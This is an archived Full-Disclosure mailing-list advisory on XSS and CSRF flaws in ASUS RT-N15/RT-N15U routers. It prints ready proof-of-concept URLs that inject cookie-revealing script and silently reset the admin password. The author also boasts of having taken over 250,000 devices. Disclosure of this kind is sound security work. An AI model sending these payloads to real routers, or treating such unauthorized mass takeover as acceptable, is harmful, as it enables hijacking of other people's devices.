lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <000b01d436e9$2147a3d0$6500a8c0@pc> Date: Sat, 18 Aug 2018 14:40:15 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <fulldisclosure@...lists.org> Subject: [FD] XSS and CSRF vulnerabilities in ASUS RT-N15U Hello list! There are multiple vulnerabilities in ASUS Wireless Router RT-N15U. There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities. ------------------------- Affected products: ------------------------- Vulnerable are the next models: ASUS RT-N15 and ASUS RT-N15U with different versions of firmware. I checked in RT-N15U with firmware version 1.9.2.7. ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/apply.cgi?current_page=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E http://site/apply.cgi?next_host=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E Cross-Site Request Forgery (WASC-09): Change password of admin: http://site/apply.cgi?action_mode=+Save+&next_page=SaveRestart.asp&sid_list=General%3B&http_passwd=admin&v_password=admin&action=Save http://site/apply.cgi?action_mode=Save%26Restart+&next_page=Restarting.asp&sid_list=General%3B&action=Save%26Restart First change password, then save and restart device. I found this router and other 250000 network devices in 2014-2015 to take control over Russian terrorists in Crimea, Donetsk and Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2018-August/012727.html). I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/8134/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists